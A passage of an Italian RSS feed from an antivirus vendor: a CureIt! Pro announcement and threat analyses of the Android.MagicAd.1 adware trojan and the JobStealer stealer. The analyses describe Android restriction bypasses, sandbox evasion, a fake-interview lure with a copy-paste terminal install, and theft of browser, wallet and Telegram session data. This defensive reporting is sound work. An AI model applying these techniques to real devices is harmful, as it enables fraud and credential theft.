disponibili:&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;La classica versione gratuita di Dr.Web CureIt! per il download e la cura di emergenza;&lt;/li&gt;&lt;li&gt;La versione estesa dell'utility Dr.Web CureIt! Pro.&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Avete altre domande o avete notato un comportamento anomalo del programma? Le vostre opinioni sono molto importanti per noi. Scrivete i vostri commenti e suggerimenti nella &lt;a href="https://forum.drweb.com/index.php?showforum=92"&gt;discussione speciale &lt;/a&gt;in evidenza sul nostro forum ufficiale.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Scaricate Dr.Web CureIt! Pro oggi stesso e controllate il processo di cura in modo completo tramite le impostazioni estese! &amp;nbsp;&lt;/strong&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15268&amp;lng=it</guid><title>Dr.Web CureIt! diventerà ancora più comoda. Annuncio della versione Pro estesa</title><link>https://news.drweb-av.it/show/?i=15268&amp;lng=it&amp;c=5</link><pubDate>Wed, 10 Jun 2026 09:50:40 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Abbiamo analizzato il feedback dei nostri utenti e siamo giunti a una conclusione importante. In un momento critico, quando il computer è infetto, non sono necessarie impostazioni complesse — è necessaria una soluzione veloce, facile e affidabile, che si avvierà e curerà il sistema con un singolo pulsante.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Pertanto abbiamo revisionato i principi di utilizzo dell'utility. Il classico Dr.Web CureIt! gratuito resterà disponibile, ma sarà ancora più focalizzato sull'obiettivo principale: lo scaricate, fate clic su "Controlla" e il gioco è fatto. Questo è uno scanner affidabile fulminante per la cura di emergenza, che è capace di neutralizzare le minacce attive e far guarire il sistema.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;E per quelli che hanno bisogno di controllo sul processo?&lt;/strong&gt;&lt;br&gt;Non abbiamo rimosso le funzionalità estese. Al contrario, le abbiamo raccolte in un prodotto separato — Dr.Web CureIt! Pro — e lo abbiamo reso più comodo e accessibile. Se vi serve eseguire la scansione di un supporto rimovibile, escludere cartelle dalla scansione o configurare le azioni automatiche da applicare alle minacce rilevate — ottenete uno scanner flessibile con piene funzionalità per soldi minimi.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Come funzionerà&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Gratis e facilmente — scaricate il solito Dr.Web CureIt! e lanciate istantaneamente la scansione rapida. Questa è la soluzione ideale per le situazioni quando il tempo è un fattore critico.&lt;/li&gt;&lt;li&gt;Se vi serve una maggiore flessibilità — sul nostro sito o direttamente dalla versione gratuita potete acquistare Dr.Web CureIt! Pro e ottenere l'accesso a tutte le impostazioni estese.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Di conseguenza, offriamo una scelta consapevole: la facilità è gratis, la massima flessibilità è a una cifra simbolica: 5 euro per 5 giorni o 10 euro per 10 giorni.&lt;br&gt;Il rilascio di Dr.Web CureIt! Pro sarà già all'inizio di luglio. La settimana prima forniremo a tutti gli utenti l'accesso gratuito a tutte le funzionalità Pro in modo che possiate valutarle prima di prendere una decisione.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15262&amp;lng=it</guid><title>Trojan Android.MagicAd mostra annunci nonostante ogni restrizione</title><link>https://news.drweb-av.it/show/?i=15262&amp;lng=it&amp;c=5</link><pubDate>Fri, 05 Jun 2026 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Gli specialisti del laboratorio antivirus dell'azienda Doctor Web hanno rilevato un programma trojan, denominato Android.MagicAd, che con vari metodi aggira le restrizioni del sistema operativo Android e visualizza la pubblicità al funzionamento in background. Uno dei metodi è universale, gli altri sono progettati per dispositivi di produttori specifici. Includono lo sfruttamento di applicazioni di terze parti, nonché l'utilizzo del lettore multimediale di sistema.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; veniva distribuito attraverso lo store ufficiale delle app per dispositivi Xiaomi GetApps ed era nascosto in più di 50 vari giochi e programmi. Comparivano nello store per un breve periodo — il più delle volte, fino a un mese, dopodiché scomparivano, e al loro posto ne comparivano di nuovi. Probabilmente, i malintenzionati cercavano in questo modo di proteggere &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; dal rilevamento prematuro, mantenendo, allo stesso tempo, la sua attività, in quanto, dopo la rimozione dallo store, i programmi trojan rimangono sui dispositivi degli utenti e possono continuare a svolgere le operazioni malevole. Al momento, nessuna delle applicazioni con &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; da noi rilevate è disponibile per il download su GetApps, e gli sviluppatori che le distribuivano hanno smesso di pubblicare nuovi programmi con il trojan.&lt;/p&gt;

&lt;p&gt;Lo studio effettuato dagli analisti dei virus Doctor Web ha mostrato che le prime versioni di &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; sono emerse nel 2025 e, oltre allo store di app GetApps, si trovavano anche su Samsung Galaxy Store.&lt;/p&gt;

&lt;div class="img img-two"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Esempi di giochi e programmi dallo store di app GetApps che contenevano Android.MagicAd.1. Al momento della pubblicazione della nostra notizia, queste e altre varianti del trojan non sono più disponibili per il download&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Parte delle funzionalità malevole di &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; si trova nei moduli dex che sono nascosti in librerie native cifrate nella directory con le risorse file del trojan. Nel corso del funzionamento, il malware decifra queste librerie, ne estrae i propri componenti e li esegue.&lt;/p&gt;

&lt;p&gt;Prima di iniziare a visualizzare annunci pubblicitari, il trojan esegue una serie di controlli per assicurarsi che il suo ambiente sia sicuro. Ad esempio, cerca segni di operazione in ambiente virtuale, controlla se la sua installazione è stata organica e se l'indirizzo IP del dispositivo infettato non è presente sulla sua blacklist ecc.&lt;/p&gt;

&lt;p&gt;Se &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; non rileva attività sospette, nasconde la propria icona dalla lista dei programmi nel menu della schermata principale. Quindi crea un canale di notifica, attraverso il quale avvia diversi servizi malevoli di persistenza, che sono necessari per il funzionamento in background con la finestra dell'applicazione malevola chiusa. In seguito, il pianificatore attività di &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; crea un task per il riavvio periodico dei servizi che controllano l'operazione del canale di notifica e, se necessario, riavviano questo canale. Inoltre, in caso di funzionamento su dispositivi con versioni di SO Android relativamente vecchie, il trojan avvia uno schermo virtuale per evitare che il sistema interrompa il funzionamento di uno dei suoi componenti.&lt;/p&gt;

&lt;p&gt;Per visualizzare la pubblicità in modalità background quando la sua finestra è chiusa, &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; impiega una serie di tecniche che vengono selezionate in base al produttore del dispositivo infetto. Esse vengono implementate senza la richiesta esplicita dell'autorizzazione di sistema &lt;span class="string"&gt;SYSTEM_ALERT_WINDOW&lt;/span&gt;, la quale permette a un'applicazione di essere visualizzata sopra altri programmi.&lt;/p&gt;

&lt;p&gt;Indipendentemente dal metodo utilizzato, tutti i banner pubblicitari vengono caricati come activity traslucida, il che consente al trojan di disegnarli sopra le finestre esistenti.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;

    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Esempi di annunci visualizzati da Android.MagicAd.1&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Una delle tecniche viene implementata tramite intent indirizzati ad altre applicazioni. Essa consente al trojan di aggirare le restrizioni delle versioni moderne di SO Android che impediscono ai programmi di avviare se stessi. A seconda del modello di dispositivo infetto, tramite questa tecnica &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; o mostra gli annunci esso stesso o "costringe" direttamente i programmi target a visualizzare i banner pubblicitari.&lt;/p&gt;

&lt;p&gt;In una delle varianti di questo metodo, il target del trojan sono:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        il browser Mi Browser sui dispositivi Xiaomi;
    &lt;/li&gt;
    &lt;li&gt;
        la shell grafica Miui SystemUI sui dispositivi Xiaomi;
    &lt;/li&gt;
    &lt;li&gt;
        il launcher Amazon Fire TV Home Screen sui dispositivi Amazon TV.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tutte queste sono applicazioni di sistema sui relativi dispositivi, pertanto sono in grado di elaborare intent anche quando non sono direttamente avviate dall'utente. Fino a quando questi programmi sono attivi e possono accettare intent, &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; può utilizzarli per la visualizzazione di annunci.&lt;/p&gt;

&lt;p&gt;Va notato che se su un dispositivo Xiaomi Mi Browser è installato non come app di sistema, il trojan anche può utilizzare questo programma per la visualizzazione di pubblicità — fino a quando la finestra del browser non venga chiusa.&lt;/p&gt;

&lt;p&gt;Quando &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; scopre Mi Browser su un dispositivo adatto, invia un intent differito per l'avvio della pubblicità al proprio componente dex (rilevato da Dr.Web come &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;). Quest'ultimo ne genera il proprio intent e lo passa al browser, il quale estrae l'intent originale e avvia la pubblicità in conformità ad esso.&lt;/p&gt;

&lt;p&gt;L'interazione con gli altri due programmi è leggermente diversa&amp;nbsp;— essi vengono utilizzati per reinvocare il trojan dalla modalità background. All'inizio &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; invia al modulo &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt; l'intent differito per l'avvio della pubblicità, e quest'ultimo passa ai programmi target il proprio intent per il proprio risveglio. Se il target è l'app Miui SystemUI, essa invia in risposta il proprio intent per l'avvio del modulo. Il programma target Amazon Fire TV Home Screen, invece, avvia il modulo direttamente&amp;nbsp;— in base al nome del pacchetto. Avendo ottenuto il controllo, il modulo &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.origin&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.origin&lt;/b&gt;&lt;/a&gt; avvia la pubblicità che ha ricevuto nell'intent differito dall'applicazione malevola principale.&lt;/p&gt;

&lt;p&gt;Se il trojan non ha potuto mostrare la pubblicità, cerca di adoperare questo metodo altre due volte e, se fallisce, prova a mostrare la pubblicità direttamente, senza più utilizzare gli intent differiti e il proprio modulo dex malevolo.&lt;/p&gt;

&lt;p&gt;Un'altra variazione di questo metodo è simile a quella precedente e viene impiegata per sfruttare programmi sui dispositivi Vivo. La differenza è che l'avvio della pubblicità avviene tramite Android Binder&amp;nbsp;— il componente di sistema che fornisce l'interazione tra processi. In questo caso, il trojan ha come target i seguenti programmi di sistema:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        iManager,
    &lt;/li&gt;
    &lt;li&gt;
        Rubrica,
    &lt;/li&gt;
    &lt;li&gt;
        Vivo Browser,
    &lt;/li&gt;
    &lt;li&gt;
        Baidu IME Customized.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; li avvia tramite Android Binder inviando ad esso normali intent tramite il container di dati Parcel. Questi programmi quindi avviano il componente trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.origin&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.origin&lt;/b&gt;&lt;/a&gt;, il quale, dopo essere uscito dalla modalità background, mostra gli annunci.&lt;/p&gt;

&lt;p&gt;In &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; sono anche previste alcune altre tecniche per la visualizzazione di pubblicità durante il funzionamento in background, tra cui l'utilizzo del lettore multimediale. A differenza dei metodi mirati ai dispositivi specifici, questo è un metodo universale e funziona sulla maggior parte dei modelli di vari produttori. &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; decifra dal suo corpo un file audio e lo salva nella directory di lavoro. Quindi il malware avvia la propria istanza del lettore multimediale di sistema, imposta in essa il volume al minimo e la associa al sistema di gestione multimediale globale di SO Android. Successivamente per l'avvio della pubblicità &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; registra un broadcast receiver che intercetta i clic in questo lettore. Il trojan quindi tramite un comando adb speciale simula le azioni utente facendo clic sul pulsante di registrazione nel lettore, dopodiché chiude subito la sua finestra. La pressione del pulsante provoca l'attivazione del media receiver di sistema, il quale consente ad &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; di intercettare il controllo e avviare la pubblicità.&lt;/p&gt;

&lt;p&gt;Dr.Web Security Space per dispositivi mobili rileva e rimuove in modo affidabile tutte le versioni conosciute del programma malevolo &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, pertanto per i nostri utenti esso non rappresenta alcun pericolo.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.MagicAd.1/README.adoc" target="_blank" rel="noopener"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15253&amp;lng=it</guid><title>Invece di un lavoro — dati e soldi rubati. Trojan stealer che attacca utenti di macOS e Windows è nascosto in false app per colloqui online</title><link>https://news.drweb-av.it/show/?i=15253&amp;lng=it&amp;c=5</link><pubDate>Wed, 27 May 2026 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;&lt;strong&gt;Gli esperti Doctor Web avvertono della diffusione di JobStealer, un programma trojan che ruba informazioni confidenziali agli utenti di computer con macOS e Windows. In primo luogo, è mirato al furto di dati da portafogli di criptovalute. I truffatori, con il pretesto di colloqui di lavoro online, attirano le potenziali vittime verso siti malevoli dove invitano a installare un'applicazione per videoconferenze. In realtà, questo software è il trojan JobStealer.&lt;/strong&gt;&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;L'attacco inizia con una mossa dei malintenzionati che contattano le potenziali vittime e offrono loro una specifica posizione lavorativa vacante. Invitano gli utenti a un colloquio di lavoro e forniscono loro link ai siti delle "piattaforme" di riunioni online — presumibilmente per consentire loro di connettersi a una videoconferenza. Questi siti hanno un aspetto presentabile, ma in realtà sono fraudolenti. Da essi, sotto le apparenze di un'app per videoconferenze online, viene scaricato il programma malevolo JobStealer. I cybercriminali utilizzano diversi design per tali risorse internet, nonché cambiano i nomi del software stesso. I nostri specialisti hanno trovato le varianti con i nomi MeetLab, Juseo, Meetix, Carolla e altri ancora. In alcuni casi, i cybercriminali utilizzano i nomi di servizi reali, come Webex.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.1.png" alt="#drweb"&gt; &lt;/a&gt;
&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Esempi di siti di falsi servizi di videoconferenza da cui viene scaricato JobStealer&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Per far credere agli utenti che le piattaforme siano pienamente funzionanti, i truffatori creano i relativi canali telegram e account sui social network, ad esempio, X.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.png" data-fancybox=""&gt;
&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.1.png" alt="#drweb"&gt;&lt;/a&gt;
&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Per camuffare il trojan da software legittimo, i malintenzionati creano l'apparenza di attività sui social network&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Per l'installazione dell'applicazione sui dispositivi macOS, ai visitatori dei siti malevoli vengono proposte due opzioni:&lt;/p&gt;

&lt;ul class="list"&gt;
&lt;li&gt;copiare ed eseguire nel terminale il comando bash indicato sul sito web;&lt;/li&gt;
&lt;li&gt;scaricare il file dell'immagine disco in formato &lt;span class="string"&gt;.dmg&lt;/span&gt; e avviarlo.&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Si scarica il trojan JobStealer dai siti malevoli sia in forma di container dmg che eseguendo un comando bash nel terminale&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Nel primo caso, all'esecuzione del comando nel terminale, viene scaricato da internet ed eseguito automaticamente uno script che scarica e avvia il file eseguibile di JobStealer (viene rilevato come&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;Nel secondo caso, l'immagine dmg suggerita per il download contiene inizialmente i file sopra elencati. Una volta montato, visualizza le istruzioni su come "installare" l'applicazione. Le istruzioni indicano che l'utente deve aprire il terminale e trascinare nella sua finestra lo script allegato. In realtà, anziché installare il software per videoconferenze, lo script avvierà il file trojan.&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Immagine con le istruzioni, visualizzata all'apertura del file dell'immagine con il trojan JobStealer&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;è un file contenitore eseguibile in formato Fat Mach-O, contiene codice binario per più architetture di processore — x64 e arm64. A seconda della piattaforma del computer infetto, all'avvio del trojan viene inizializzato automaticamente il componente corrispondente al processore target.&lt;/p&gt;

&lt;p&gt;Va notato che esistono diverse versioni di&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;. Le versioni meno recenti dell'applicazione malevola non supportavano il funzionamento sui computer Mac con architettura arm64. Inoltre, non includevano l'offuscamento — una funzione che gli autori del malware hanno iniziato ad aggiungere e rafforzare con l'aggiornamento del stealer.&lt;/p&gt;

&lt;p&gt;Una volta avviato, &lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;visualizza una finestra di phishing dove informa di un presunto errore di funzionamento. Per "risolverlo", il programma malevolo chiede all'utente di inserire la password del suo account.&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Finestra di phishing in cui viene richiesta la password dell'account dell'utente di Mac&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Quindi&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;raccoglie i seguenti dati:&lt;/p&gt;

&lt;ul class="list"&gt;
&lt;li&gt;versione del sistema operativo e l'identificatore del computer;&lt;/li&gt;
&lt;li&gt;dati di circa 300 estensioni browser di portafogli di criptovalute, installate nei browser target su base Chomium (Chrome, Opera, Brave, OperaGX, Vivaldi, Edge, Arc, CocCoc);&lt;/li&gt;
&lt;li&gt;file cookie da questi browser;&lt;/li&gt;
&lt;li&gt;password, nonché dettagli di carte bancarie, salvati nelle liste di compilazione moduli automatica del browser;&lt;/li&gt;
&lt;li&gt;file dell'applicazione di messaggistica Telegram dalle directory &lt;span class="string"&gt;/Library/Application Support/Telegram Desktop/tdata&lt;/span&gt; e &lt;span class="string"&gt;/Documents/temp_data/Apps/Telegram&lt;/span&gt;, dove vengono memorizzati le chiavi di autorizzazione della sessione, i file scaricati ecc.;&lt;/li&gt;
&lt;li&gt;note dell'utente dall'applicazione nativa Note di macOS;&lt;/li&gt;
&lt;li&gt;dati sulla presenza nel sistema delle applicazioni di portafogli di criptovalute Ledger Live e Trezor Suite.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Questi dati vengono compressi in archivio ZIP e caricati sul Server C2.&lt;/p&gt;

&lt;p&gt;Gli autori del malware hanno preparato una versione del trojan JobStealer anche per i computer con SO Windows. Le sue funzionalità sono analoghe a quelle della versione per macOS. Inoltre, su alcuni siti malevoli che distribuiscono lo stealer, sono previste sezioni per il download dell'applicazione su altri sistemi operativi popolari. Tuttavia, al momento, i nostri analisti dei virus non hanno registrato la distribuzione di tale software. Ad esempio, il pulsante di download del programma per SO Linux o è inattiva o porta alla versione Windows del trojan. Mentre le sezioni dedicate al download del programma per dispositivi basati su iOS e Android informano che queste versioni siano in fase di sviluppo. Allo stesso tempo, non si può escludere che in futuro i malintenzionati inizieranno a distribuire anche le varianti del trojan per queste piattaforme.&lt;/p&gt;

&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Siti malevoli potenzialmente possono distribuire le versioni del trojan JobStealer per Linux, iOS e Android&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Tutte le versioni conosciute dell'applicazione malevola JobStealer vengono rilevate ed eliminate in modo affidabile dai prodotti antivirus Dr.Web Security Space per macOS e Windows e non rappresentano minaccia per i nostri utenti. I siti fraudolenti che distribuiscono il trojan sono aggiunti al database delle risorse non raccomandate e pericolose e anche vengono bloccati da Dr.Web.
&lt;/p&gt;

&lt;h3&gt;MITRE ATT&amp;amp;CK®&lt;/h3&gt;

&lt;p&gt;Abbiamo analizzato il malware JobStealer tramite il framework MITRE&amp;nbsp;ATT&amp;amp;CK®, una matrice che descrive le tattiche e tecniche dei cybercriminali che attaccano sistemi informatici. Sono state individuate le seguenti tecniche chiave:&lt;/p&gt;

&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;strong&gt;Fase&lt;/strong&gt;&lt;/th&gt;&lt;th&gt;&lt;strong&gt;Tecnica&lt;/strong&gt;&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Esecuzione&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;Esecuzione con la partecipazione dell'utente (T1204)&lt;/p&gt;
&lt;p&gt;Copia e incolla malevolo (T1204.004)&lt;/p&gt;
&lt;p&gt;File malevolo (T1204.002)&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Individuazione&lt;/td&gt;
&lt;td&gt;Individuazione di file e cartelle (T1083)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Raccolta dei dati&lt;/td&gt;
&lt;td&gt;&lt;p&gt;Raccolta automatizzata (T1119)&lt;/p&gt;
&lt;p&gt;Dati dal sistema locale (T1005)&lt;/p&gt;
&lt;p&gt;Credenziali dagli archivi di password (T1555)&lt;/p&gt;
&lt;p&gt;Accesso Portachiavi (T1555.001)&lt;/p&gt;
&lt;p&gt;Credenziali dai browser (T1555.003)&lt;/p&gt;
